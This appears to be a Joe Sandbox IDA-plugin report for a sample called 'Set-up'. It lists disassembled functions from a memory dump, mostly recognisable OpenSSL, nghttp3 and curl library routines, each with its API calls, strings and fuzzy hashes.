Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: strlen
String ID: QUIC error code: 0x%llx%s%s%s (triggered by frame type: 0x%llx%s%s%s), reason: "%s"$QUIC error code: 0x%llx%s%s%s, reason: "%s"$ossl_quic_channel_raise_protocol_error_loc$ssl/quic/quic_channel.c
API String ID: 39653677-1084217658
Opcode ID: f1bbb02acf4e43345f37cdf8a411c1889c09a945d4a5f428a4c25238d4c7636b
Instruction ID: 4a785e00abed06ae231cb925cf00e73b842de7aac4831d03fcc946c4cf18ef26
Opcode Fuzzy Hash: f1bbb02acf4e43345f37cdf8a411c1889c09a945d4a5f428a4c25238d4c7636b
Instruction Fuzzy Hash: 5F51B1B5A04309ABDF01DF64DC42A9B7BE9FF88714F044928FE58DB201E675D9109BA2

Function 00556250 Relevance: 7.7, APIs: 5, Instructions: 151COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,002A0E3B,?,?,00000000,?), ref: 005563E9
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,002A0E3B,?,?,00000000,?), ref: 005563FB

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _errno
String ID:
API String ID: 2918714741-0
Opcode ID: 4f8baaeefaddc7fedaa8cefedb757150924dcd239e2764457936430ee8bef0ab
Instruction ID: a05f38e9544c3b8edd447dfea109e39fa91465fa75236798bb93375785705c58
Opcode Fuzzy Hash: 4f8baaeefaddc7fedaa8cefedb757150924dcd239e2764457936430ee8bef0ab
Instruction Fuzzy Hash: 6141D575A043429BD7009F6898A0A2B7BE4BFD4756F964C3AFC49C7201E674DC088792

Function 0051A340 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 106stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,0051ABB9), ref: 0051A34E

Part of subcall function 003AE270: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(crypto/mem_sec.c,00000187,assertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0,crypto/mem_sec.c,00000185,assertion failed: list >= 0 && list < sh.freelist_size,crypto/mem_sec.c,00000184,-00000001), ref: 003AE28D

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,0051ABB9), ref: 0051A446

Strings

crypto/conf/conf_def.c, xrefs: 0051A3B9, 0051A410
.conf, xrefs: 0051A376
.cnf, xrefs: 0051A38E

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: strlen$_errno
String ID: .cnf$.conf$crypto/conf/conf_def.c
API String ID: 3066963124-3060939390
Opcode ID: fbf3ad6da990937f1e044ca2cffd0cc49c41401fc71dc8f74dd16e8b52a1fec7
Instruction ID: 4497672bbd096a2a08349558cec1b3e9fa855c98862f0e2b62bd87c46ec7a7f2
Opcode Fuzzy Hash: fbf3ad6da990937f1e044ca2cffd0cc49c41401fc71dc8f74dd16e8b52a1fec7
Instruction Fuzzy Hash: A32105A1D053017BEA127670BC53FAB3B8CEF62714F040839F815D9382F669C9548263

Function 005566C0 Relevance: 7.6, APIs: 5, Instructions: 100stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00557850: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,005566E9,?,?,?,?,?,?,?,?,?,?,?), ref: 0055787B

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,UTF-8,00000001,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 005566F5
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00918FEC,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00556714
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00556727
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00556776
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 005567CC

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _errno$strcmp
String ID:
API String ID: 3909137471-0
Opcode ID: a59f3e9c5d1194da5c637c61fff7f8d0b53dd94caf50f58693b6ff42e6fd20f2
Instruction ID: 40f2d4c84e89e04d43f0a24ec2b17d7ba61147db600eb857cf21154dc7cd0b67
Opcode Fuzzy Hash: a59f3e9c5d1194da5c637c61fff7f8d0b53dd94caf50f58693b6ff42e6fd20f2
Instruction Fuzzy Hash: 373103366042419FCB109FA4DC54A1A7BE8FF4D32AF850129FD58DB212E731ED04CB91

Function 003B2010 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,003B2704,00000008), ref: 003B204D

Part of subcall function 00387220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/user/eng_list.c,000000EB,user_get_first,00000000,003ABD91), ref: 00387262
Part of subcall function 00387220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/user/eng_list.c,000000EB,user_get_first,00000000,003ABD91), ref: 00387285
Part of subcall function 00387220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/user/eng_list.c,000000EB,user_get_first,00000000,003ABD91), ref: 003872C5
Part of subcall function 00387220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/user/eng_list.c,000000EB,user_get_first,00000000,003ABD91), ref: 003872E8

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,?,003B2704,00000008), ref: 003B20C3

Strings

general_set_int, xrefs: 003B2086
crypto/params.c, xrefs: 003B2090, 003B20E4
copy_integer, xrefs: 003B20DA

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: strcpystrlen$memcpymemset
String ID: copy_integer$crypto/params.c$general_set_int
API String ID: 2323844366-2562949257
Opcode ID: 44d5288a9cc8a7f92012ca000d8484fac535762a6c21c0e47d00125ce7710354
Instruction ID: a00592942f2bcd6b8f60bf660b72c9ff88f0584e70c1c73a179a94e0682a9dce
Opcode Fuzzy Hash: 44d5288a9cc8a7f92012ca000d8484fac535762a6c21c0e47d00125ce7710354
Instruction Fuzzy Hash: D12140706083006BD23276249C86FBB7799D74470CF150169FB189BB83D655EC05D361

Function 003B2140 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,003B299E,00000008), ref: 003B21A8
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,003B299E,00000008), ref: 003B21FE

Part of subcall function 003B40A0: memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,003B2075,?,?,?,?,?,?,003B2704,00000008), ref: 003B40C1
Part of subcall function 003B40A0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,003B2075,?,?,?,?,?,?,003B2704,00000008), ref: 003B411E

Strings

general_get_uint, xrefs: 003B2176, 003B21BA
crypto/params.c, xrefs: 003B2180, 003B21C4, 003B221E
copy_integer, xrefs: 003B2214

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: memcpymemset
String ID: copy_integer$crypto/params.c$general_get_uint
API String ID: 1297977491-1187682564
Opcode ID: db325fd992e53e59bafdd7aa57342e4bd764294c5113bc0b7ae3e62aec5676fd
Instruction ID: 345435e8ae6f90f5c3d74e9d73283448a50a84353e1316810f1f2027d385ef45
Opcode Fuzzy Hash: db325fd992e53e59bafdd7aa57342e4bd764294c5113bc0b7ae3e62aec5676fd
Instruction Fuzzy Hash: AF215B76B8430076D12232787C03FAF674ADBC4B29F2A0565FB28AE6C3EA9598015291

Function 003B2240 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 88COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,?,003B2BF4,00000008), ref: 003B22C1
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,?,003B2BF4,00000008), ref: 003B2312

Strings

crypto/params.c, xrefs: 003B2295, 003B22DC
copy_integer, xrefs: 003B228B
general_set_uint, xrefs: 003B22D2

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: memcpymemset
String ID: copy_integer$crypto/params.c$general_set_uint
API String ID: 1297977491-3191580373
Opcode ID: a5afc82b6e552bd7c898598fae052e4884e6e8cd0cc05bc9591397ccfaaba02b
Instruction ID: 5803b4c4d7794c876f40f3b74c8fc1acd895748db05b6663d322e16901b4b5be
Opcode Fuzzy Hash: a5afc82b6e552bd7c898598fae052e4884e6e8cd0cc05bc9591397ccfaaba02b
Instruction Fuzzy Hash: AA217C747083002BDB326564AC46F7F7789EBD570CF260A6DFA19DEA83E695EC400361

Function 003B40A0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 64COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,003B2075,?,?,?,?,?,?,003B2704,00000008), ref: 003B40C1

Part of subcall function 00387220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/user/eng_list.c,000000EB,user_get_first,00000000,003ABD91), ref: 00387262
Part of subcall function 00387220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/user/eng_list.c,000000EB,user_get_first,00000000,003ABD91), ref: 00387285
Part of subcall function 00387220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/user/eng_list.c,000000EB,user_get_first,00000000,003ABD91), ref: 003872C5
Part of subcall function 00387220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/user/eng_list.c,000000EB,user_get_first,00000000,003ABD91), ref: 003872E8

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,003B2075,?,?,?,?,?,?,003B2704,00000008), ref: 003B411E

Strings

crypto/params.c, xrefs: 003B40DD, 003B413E
copy_integer, xrefs: 003B4134
unsigned_from_signed, xrefs: 003B40D3

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: strcpystrlen$memcpymemset
String ID: copy_integer$crypto/params.c$unsigned_from_signed
API String ID: 2323844366-3781254518
Opcode ID: ebccecd23e85608714a6a968323c933b9e94b0ec086b48c0d920460a80d06715
Instruction ID: 74fef77570ac939199c87a9822054ef32b03bb38b848864f0904c8e2d3fd479a
Opcode Fuzzy Hash: ebccecd23e85608714a6a968323c933b9e94b0ec086b48c0d920460a80d06715
Instruction Fuzzy Hash: DA016DA5F8431036D23272787C07FAF2B49DBD0B19F150875F714EA6C3E6D9A84443AA

Function 0027E600 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 226COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(0080FF5C,nghttp3_qpack.c,00000811,?,?), ref: 0027E866
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(space <= ctx->max_dtable_capacity,nghttp3_qpack.c,0000080D,?,?,?,?,?,0028077F,?,?,00000000,00000000), ref: 0027E87B

Strings

nghttp3_qpack.c, xrefs: 0027E85C, 0027E871
space <= ctx->max_dtable_capacity, xrefs: 0027E876

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp3_qpack.c$space <= ctx->max_dtable_capacity
API String ID: 1222420520-1270044496
Opcode ID: 48aa188aafbab7e33bddd5741478dd7a87853b61746c34636279fdb11609d8d3
Instruction ID: fa54b5585f2b17b748a35c61fef5f2ab15c3c04ac39a4938d92a66aa74b1ddad
Opcode Fuzzy Hash: 48aa188aafbab7e33bddd5741478dd7a87853b61746c34636279fdb11609d8d3
Instruction Fuzzy Hash: 368181B5A106019FD710DF24D882A26B7F5FF49318F088668E88D97712E731F975CB92

Function 00288350 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180stringCOMMON

Download Yara Rule

APIs

strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002E), ref: 002883AD
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(HOSTALIASES), ref: 002883C5

Part of subcall function 002977B0: fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00816A0D,00000000,00000000,?,?,?,00299882,?,00000000), ref: 002977DD
Part of subcall function 002977B0: fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000002,?,00000000), ref: 002977F0
Part of subcall function 002977B0: fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,00000000), ref: 00297802

_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 0028853F

Strings

HOSTALIASES, xrefs: 002883C0

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _stricmpfclosefopenfseekgetenvstrchr
String ID: HOSTALIASES
API String ID: 1675145106-255135673
Opcode ID: 3ff1ae1a3d491380e2f347e039fe51f26b882d0ac302841c18f07b9a54793c52
Instruction ID: 921e7a05615318c5b7b76eed8335e52e444753a5486bd9bfd599c4a910ddf72c
Opcode Fuzzy Hash: 3ff1ae1a3d491380e2f347e039fe51f26b882d0ac302841c18f07b9a54793c52
Instruction Fuzzy Hash: F551F6A6D2838257FB10EB209C017BB72D89FE5348F01992DFD8981193FB74E5A48B12

Function 001D81B0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 150stringCOMMON

Download Yara Rule

APIs

_stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(001D54E6), ref: 001D8235
strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000002F), ref: 001D82D4
strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000005C), ref: 001D82E1

Strings

mime.c, xrefs: 001D824C, 001D82B8, 001D832D, 001D8342, 001D835E, 001D837A, 001D839C

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: strrchr$_stat64
String ID: mime.c
API String ID: 2771713950-3378952128
Opcode ID: 5b82a4ae7c2e9782db918f9831bcf204c283197a5d91770812dba17b897ef26a
Instruction ID: c083071036aa84ef87ca4bd0ba1288ae00fcacbb569052b3693da0fa8015fa6d
Opcode Fuzzy Hash: 5b82a4ae7c2e9782db918f9831bcf204c283197a5d91770812dba17b897ef26a
Instruction Fuzzy Hash: B45116B1A01300ABEB249F18DC867673BA4AF55B10F04022AFC589F3C6FBB5ED058791

Function 00256710 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 125COMMON

Download Yara Rule

APIs
